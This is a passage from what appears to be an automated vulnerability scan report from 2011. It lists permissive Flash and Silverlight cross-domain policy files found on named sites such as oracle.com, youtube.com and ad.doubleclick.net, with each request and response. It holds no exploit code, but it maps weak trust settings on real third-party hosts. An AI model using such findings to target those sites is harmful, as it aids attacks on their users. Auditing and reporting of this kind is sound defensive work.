domain="*.Accuweather.com "/> <allow-access-from domain="*.Cbs.com "/> <allow-access-from domain="*.cbsnews.com "/> <allow-access-from domain="*.discovery.com "/> <allow-access-from domain="*.ew.com "/> <allow-access-from domain="*.fox.com "/> <allow-access-from domain="*.foxnews.com "/> <allow-access-from domain="*.ign.com "/> <allow-access-from domain="*.people.com "/> <allow-access-from domain="*.tvguide.com "/> <allow-access-from domain="*.weather.com "/> <allow-access-from domain="*.vh1.com "/> <allow-access-from domain="*.usatoday.com "/> <allow-access-from domain="*.bmg.com "/> <allow-access-from domain="*.bmgmusic.com "/> <allow-access-from domain="*.people.com "/> <allow-access-from domain="*.fluid.nl "/> <allow-access-from domain="*.myspace.com "/> <allow-access-from domain="*.myspacecdn.com "/> <allow-access-from domain="*.newsvine.com "/> <allow-access-from domain="*.stamen.com " /> <allow-access-from domain="64.207.156.207 "/> <allow-access-from domain="*.msnbcmedia.msn.com " secure="false" />...[SNIP]... <allow-access-from domain="msnbcmedia.msn.com " secure="false" />...[SNIP]... <allow-access-from domain="*.s-msn.com " /> <allow-access-from domain="*.telemundo.com " /> <allow-access-from domain="*.unicornmedia.com " /> <allow-access-from domain="*.pointroll.com " /> <allow-access-from domain="*.intellitxt.com "/> <allow-access-from domain="*.panachetech.com "/> <allow-access-from domain="*.interpolls.com "/> <allow-access-from domain="*.unicornmedia.com " secure="false"/>...[SNIP]... <allow-access-from domain="*.unicornapp.com " secure="false"/>...[SNIP]... <allow-access-from domain="*.unicornmediabeta.com " secure="false"/>...[SNIP]... <allow-access-from domain="today.com " /> <allow-access-from domain="*.today.com " /> <allow-access-from domain="*.pointroll.net " /> <allow-access-from domain="*.imwx.com " />...[SNIP]...
4.122. http://www.oracle.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.oracle.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.oracle.com
Response
HTTP/1.0 200 OK Last-Modified: Tue, 12 Apr 2011 22:21:08 GMT ETag: "969d62-414-4a0c01bd5bd00" Content-Type: application/xml Content-Language: en Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (G;max-age=300+0;age=0;ecid=309450997205923259,0) Date: Tue, 06 Sep 2011 15:53:59 GMT Content-Length: 1044 Connection: close <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="*.oracle.com "/> <allow-access-from domain="oracle.com "/>...[SNIP]... <allow-access-from domain="presenter.oracle.com "/> <allow-access-from domain="streaming.oracle.com "/> <allow-access-from domain="web148.oracle.com "/> <allow-access-from domain="http://72.47.210.156 "/> <allow-access-from domain="http://216.70.88.224 "/> <allow-access-from domain="events-mktas.oracle.com "/> <allow-access-from domain="events-mktap.oracle.com "/> <allow-access-from domain="eventreg.oracle.com "/> <allow-access-from domain="*.brightcove.com "/> <allow-access-from domain="admin.brightcove.com "/> <allow-access-from domain="www.oracleimg.com "/> <allow-access-from domain="medianetwork.oracle.com "/> <allow-access-from domain="*.akamai.com "/> <allow-access-from domain="*.omniture.com "/>...[SNIP]...
4.123. http://www.oracleimg.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.oracleimg.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.oracleimg.com
Response
HTTP/1.0 200 OK Last-Modified: Tue, 12 Apr 2011 22:21:08 GMT ETag: "969d62-414-4a0c01bd5bd00" Content-Type: application/xml Content-Language: en Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (G;max-age=300+0;age=0;ecid=194754870172961622,0) Date: Tue, 06 Sep 2011 15:54:07 GMT Content-Length: 1044 Connection: close <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="*.oracle.com "/> <allow-access-from domain="oracle.com "/> <allow-access-from domain="www.oracle.com "/> <allow-access-from domain="presenter.oracle.com "/> <allow-access-from domain="streaming.oracle.com "/> <allow-access-from domain="web148.oracle.com "/> <allow-access-from domain="http://72.47.210.156 "/> <allow-access-from domain="http://216.70.88.224 "/> <allow-access-from domain="events-mktas.oracle.com "/> <allow-access-from domain="events-mktap.oracle.com "/> <allow-access-from domain="eventreg.oracle.com "/> <allow-access-from domain="*.brightcove.com "/> <allow-access-from domain="admin.brightcove.com "/>...[SNIP]... <allow-access-from domain="medianetwork.oracle.com "/> <allow-access-from domain="*.akamai.com "/> <allow-access-from domain="*.omniture.com "/>...[SNIP]...
4.124. http://www.sapient.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.sapient.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.sapient.com
Response
HTTP/1.1 200 OK Cache-Control: max-age=86400 Content-Length: 588 Content-Type: text/xml Last-Modified: Thu, 23 Apr 2009 19:45:38 GMT Accept-Ranges: bytes ETag: "5321c4134cc4c91:27f4" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 06 Sep 2011 15:32:32 GMT Connection: close ...<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"[]> <cross-domain-policy> <allow-access-from domain="*.sapient.com " secure="false" />...[SNIP]... <allow-access-from domain="*.sapientem.com " secure="false" />...[SNIP]... <allow-access-from domain="sapient.com.edgesuite.net " secure="false" />...[SNIP]... <allow-access-from domain="edge.sapient.com " secure="false" />...[SNIP]... <allow-access-from domain="edge-dev.sapient.com " secure="false" />...[SNIP]... <allow-access-from domain="localhost " secure="false" />...[SNIP]...
4.125. http://www.youtube.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.youtube.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.youtube.com
Response
HTTP/1.0 200 OK Vary: Accept-Encoding Content-Type: text/x-cross-domain-policy Last-Modified: Fri, 03 Jun 2011 20:25:01 GMT Date: Tue, 06 Sep 2011 15:34:00 GMT Expires: Tue, 06 Sep 2011 15:34:00 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block <?xml version="1.0"?> <!-- http://www.youtube.com/crossdomain.xml --> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="*.youtube.com " /> <allow-access-from domain="s.ytimg.com " />...[SNIP]...
4.126. http://www2.znode.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www2.znode.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www2.znode.com
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:32:09 GMT Server: Apache Last-Modified: Tue, 05 Apr 2011 16:22:18 GMT ETag: "e5" Accept-Ranges: bytes Content-Length: 229 Cache-Control: max-age=63072000 Expires: Thu, 05 Sep 2013 15:32:09 GMT Vary: Accept-Encoding,User-Agent Content-Type: text/xml X-Pardot-LB: lb-s2 Connection: close <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*.pardot.com " /> <allow-access-from domain="*.visual.force.com " /> <site-control permitted-cross-domain-policies="master-on...[SNIP]...
4.127. http://1215.ic-live.com/crossdomain.xml
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://1215.ic-live.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from specific other domains. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: 1215.ic-live.com
Response
HTTP/1.0 200 OK Date: Tue, 06 Sep 2011 16:45:50 GMT Server: Apache Last-Modified: Thu, 17 Mar 2011 17:54:10 GMT ETag: "1320541-1c8-49eb15936b480" Accept-Ranges: bytes Content-Length: 456 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="/w3c/p3p.xml" Content-Type: text/xml X-Cache: MISS from i2a-coll-16 X-Cache-Lookup: MISS from i2a-coll-16:80 Via: 1.0 i2a-coll-16:80 (squid/2.6.STABLE21) Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <site-control permitted-cross-domain-policies="master...[SNIP]... <allow-access-from domain="ecdev1.avery.com " secure="false" />...[SNIP]... <allow-access-from domain="ecdev1.averysignaturebinders.com " secure="false" />...[SNIP]... <allow-access-from domain="www.averysignaturebinders.com " secure="false" />...[SNIP]...
4.128. http://admin5.testandtarget.omniture.com/crossdomain.xml
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://admin5.testandtarget.omniture.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from specific other domains. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: admin5.testandtarget.omniture.com
Response
HTTP/1.1 200 OK Server: Test & Target Content-Type: application/xml Date: Tue, 06 Sep 2011 17:05:50 GMT Accept-Ranges: bytes ETag: W/"313-1313024241000" Connection: close Set-Cookie: X-Mapping-obodhgke=640418F0570BDEEB38606A0E869DD5BA; path=/ Last-Modified: Thu, 11 Aug 2011 00:57:21 GMT Content-Length: 313 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="s7sps1.scene7.com "/> <allow-access-from domain="s7sps3.scene7.com "/> <allow-access-from domain="s7sps5.scene7.com "/>...[SNIP]...
4.129. http://api.twitter.com/crossdomain.xml
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://api.twitter.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from specific subdomains. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: api.twitter.com
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:32:11 GMT Server: hi Status: 200 OK Last-Modified: Mon, 29 Aug 2011 17:35:22 GMT Content-Type: application/xml Content-Length: 561 Cache-Control: max-age=1800 Expires: Tue, 06 Sep 2011 16:02:11 GMT Vary: Accept-Encoding Connection: close <?xml version="1.0" encoding="UTF-8"?> <cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd"> <allow-access-from domain="twitter.com " />...[SNIP]... <allow-access-from domain="search.twitter.com " /> <allow-access-from domain="static.twitter.com " />...[SNIP]...
4.130. https://docs.google.com/crossdomain.xml
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://docs.google.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: docs.google.com
Response
HTTP/1.0 200 OK Expires: Tue, 06 Sep 2011 22:44:04 GMT Date: Mon, 05 Sep 2011 22:44:04 GMT Content-Type: text/x-cross-domain-policy X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Cache-Control: public, max-age=86400 Age: 66149 <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="video.google.com " /><allow-access-from domain="s.ytimg.com " />...[SNIP]...
4.131. http://search.oracle.com/crossdomain.xml
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://search.oracle.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from specific subdomains. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: search.oracle.com
Response
HTTP/1.0 200 OK ETag: "2916d-103-4d8251fe" Content-Type: application/xml Last-Modified: Thu, 17 Mar 2011 18:25:02 GMT Server: Oracle-Application-Server-10g OracleAS-Web-Cache-10g/10.1.2.3.2 (G;max-age=0+0;age=0;ecid=118531604508,0) Date: Tue, 06 Sep 2011 15:54:24 GMT Content-Length: 259 Connection: close Set-Cookie: BIGipServerses_ext_prod_pool=2131530381.30494.0000; expires=Wed, 07-Sep-2011 03:54:24 GMT; path=/ <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="oracle.com "/> <allow-access-from domain="www.oracle.com "/>...[SNIP]...
4.132. http://sophelle.app5.hubspot.com/crossdomain.xml
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://sophelle.app5.hubspot.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from specific other domains. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: sophelle.app5.hubspot.com
Response
HTTP/1.1 200 OK Content-Length: 206 Content-Type: text/xml Last-Modified: Wed, 17 Oct 2007 22:47:20 GMT Accept-Ranges: bytes ETag: "04cb8acf11c81:111e7" Server: Microsoft-IIS/6.0 P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR" X-Powered-By: ASP.NET Date: Tue, 06 Sep 2011 15:27:54 GMT Connection: close <?xml version="1.0" ?> <!DOCTYPE cross-domain-policy (View Source for full doctype...)> - <cross-domain-policy> <allow-access-from domain="www.bluemedia.com " secure="true" /> </cross-domain-p...[SNIP]...
4.133. http://sun.edgeboss.net/crossdomain.xml
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://sun.edgeboss.net
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from specific other domains. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.1 Host: sun.edgeboss.net Proxy-Connection: keep-alive Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache ETag: "7be11faf85a93e167b2214a018411ba6:1237306055" Last-Modified: Tue, 17 Mar 2009 16:07:35 GMT Accept-Ranges: bytes Content-Length: 384 Content-Type: application/xml Date: Tue, 06 Sep 2011 16:13:00 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="optimizeyourit.com " /> <allow-access-from domain="optimiseyourit.com " /> <allow-access-from domain="www.optimizeyourit.com " /> <allow-access-from domain="www.optimiseyourit.com " />...[SNIP]...
4.134. http://twitter.com/crossdomain.xml
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://twitter.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from specific subdomains. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: twitter.com
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:32:47 GMT Server: Apache Last-Modified: Mon, 29 Aug 2011 17:35:22 GMT Accept-Ranges: bytes Content-Length: 561 Cache-Control: max-age=1800 Expires: Tue, 06 Sep 2011 16:02:47 GMT Vary: Accept-Encoding X-XSS-Protection: 1; mode=block Connection: close Content-Type: application/xml <?xml version="1.0" encoding="UTF-8"?> <cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd"> <al...[SNIP]... <allow-access-from domain="api.twitter.com " /> <allow-access-from domain="search.twitter.com " /> <allow-access-from domain="static.twitter.com " />...[SNIP]...
4.135. http://www.covergirl.com/crossdomain.xml
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.covergirl.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from specific other domains. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.covergirl.com
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Tue, 09 Aug 2011 12:19:16 GMT Accept-Ranges: bytes ETag: "03a528e8e56cc1:295a5" Server: Microsoft-IIS/6.0 X-Server: EW58 X-Powered-By: ASP.NET Date: Tue, 06 Sep 2011 16:45:26 GMT Connection: close <?xml version="1.0" ?> <cross-domain-policy> <site-control permitted-cross-domain-policies="all" /> <allow-access-from domain="cgmakeover.appspot.com "/> <allow-http-request-headers-from domain="...[SNIP]...
5. Silverlight cross-domain policy
previous
next
There are 23 instances of this issue:
Issue background
The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user. Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
5.1. http://ad.doubleclick.net/clientaccesspolicy.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/clientaccesspolicy.xml
Issue detail
The application publishes a Silverlight cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: ad.doubleclick.net
Response
HTTP/1.0 200 OK Server: DCLK-HttpSvr Content-Type: text/xml Content-Length: 314 Last-Modified: Wed, 21 May 2008 20:54:04 GMT Date: Tue, 06 Sep 2011 17:05:42 GMT <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from> <domain uri="* "/> </allow-from> <grant-to> <resource ...[SNIP]...
5.2. http://ads.pointroll.com/clientaccesspolicy.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://ads.pointroll.com
Path:
/clientaccesspolicy.xml
Issue detail
The application publishes a Silverlight cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: ads.pointroll.com
Response
HTTP/1.1 200 OK Content-Length: 348 Content-Type: text/xml Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT Accept-Ranges: bytes ETag: "80a33917f91cb1:1718" Server: Microsoft-IIS/6.0 P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC" Date: Tue, 06 Sep 2011 14:57:10 GMT Connection: close <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="http://* " /> </allow-from> ...[SNIP]...
5.3. http://ads1.msn.com/clientaccesspolicy.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://ads1.msn.com
Path:
/clientaccesspolicy.xml
Issue detail
The application publishes a Silverlight cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: ads1.msn.com
Response
HTTP/1.1 200 OK Cache-Control: max-age=31536000 Date: Tue, 06 Sep 2011 15:00:14 GMT Content-Length: 348 Content-Type: text/xml Last-Modified: Fri, 01 Apr 2011 20:58:23 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l comment "RSACi North America Server" by "inet@microsoft.com" r (n 0 s 0 v 0 l 0)) X-Powered-By: ASP.NET Expires: Tue, 01 May 2012 16:29:02 GMT Connection: close <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="SOAPAction"> <domain uri="* "/> </allow-from> ...[SNIP]...
5.4. http://b.scorecardresearch.com/clientaccesspolicy.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://b.scorecardresearch.com
Path:
/clientaccesspolicy.xml
Issue detail
The application publishes a Silverlight cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: b.scorecardresearch.com
Response
HTTP/1.0 200 OK Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT Content-Type: application/xml Expires: Wed, 07 Sep 2011 14:56:57 GMT Date: Tue, 06 Sep 2011 14:56:57 GMT Content-Length: 320 Connection: close Cache-Control: private, no-transform, max-age=86400 Server: CS <?xml version="1.0" encoding="utf-8" ?> <access-policy> <cross-domain-access> <policy> <allow-from> <domain uri="* " /> </allow-from> <grant-to> <resou...[SNIP]...
5.5. http://intelligence.marykay.com/clientaccesspolicy.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://intelligence.marykay.com
Path:
/clientaccesspolicy.xml
Issue detail
The application publishes a Silverlight cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: intelligence.marykay.com
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:45:51 GMT Server: Omniture DC/2.0.0 xserver: www425 Connection: close Content-Type: text/html <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="* " /> </allow-from> <grant-to> <resource path="/" include-subpaths="true" /> </...[SNIP]...
5.6. http://oimg.m.cnbc.com/clientaccesspolicy.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://oimg.m.cnbc.com
Path:
/clientaccesspolicy.xml
Issue detail
The application publishes a Silverlight cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: oimg.m.cnbc.com
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:07:48 GMT Server: Omniture DC/2.0.0 xserver: www369 Connection: close Content-Type: text/html <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="* " /> </allow-from> <grant-to> <resource path="/" include-subpaths="true" /> </...[SNIP]...
5.7. http://oimg.nbcuni.com/clientaccesspolicy.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://oimg.nbcuni.com
Path:
/clientaccesspolicy.xml
Issue detail
The application publishes a Silverlight cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: oimg.nbcuni.com
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 14:56:45 GMT Server: Omniture DC/2.0.0 xserver: www339 Connection: close Content-Type: text/html <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="* " /> </allow-from> <grant-to> <resource path="/" include-subpaths="true" /> </...[SNIP]...
5.8. http://omni.csc.com/clientaccesspolicy.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://omni.csc.com
Path:
/clientaccesspolicy.xml
Issue detail
The application publishes a Silverlight cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: omni.csc.com
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:57:45 GMT Server: Omniture DC/2.0.0 xserver: www366 Content-Length: 263 Keep-Alive: timeout=15 Connection: close Content-Type: text/html <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="* " /> </allow-from> <grant-to> <resource path="/" include-subpaths="true" /> </...[SNIP]...
5.9. http://oracle.112.2o7.net/clientaccesspolicy.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://oracle.112.2o7.net
Path:
/clientaccesspolicy.xml
Issue detail
The application publishes a Silverlight cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: oracle.112.2o7.net
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:54:05 GMT Server: Omniture DC/2.0.0 xserver: www635 Connection: close Content-Type: text/html <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="* " /> </allow-from> <grant-to> <resource path="/" include-subpaths="true" /> </...[SNIP]...
5.10. http://oracleglobal.112.2o7.net/clientaccesspolicy.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://oracleglobal.112.2o7.net
Path:
/clientaccesspolicy.xml
Issue detail
The application publishes a Silverlight cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: oracleglobal.112.2o7.net
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:54:27 GMT Server: Omniture DC/2.0.0 xserver: www166 Content-Length: 263 Keep-Alive: timeout=15 Connection: close Content-Type: text/html <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="* " /> </allow-from> <grant-to> <resource path="/" include-subpaths="true" /> </...[SNIP]...
5.11. http://oracleuniversity.112.2o7.net/clientaccesspolicy.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://oracleuniversity.112.2o7.net
Path:
/clientaccesspolicy.xml
Issue detail
The application publishes a Silverlight cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: oracleuniversity.112.2o7.net
Response
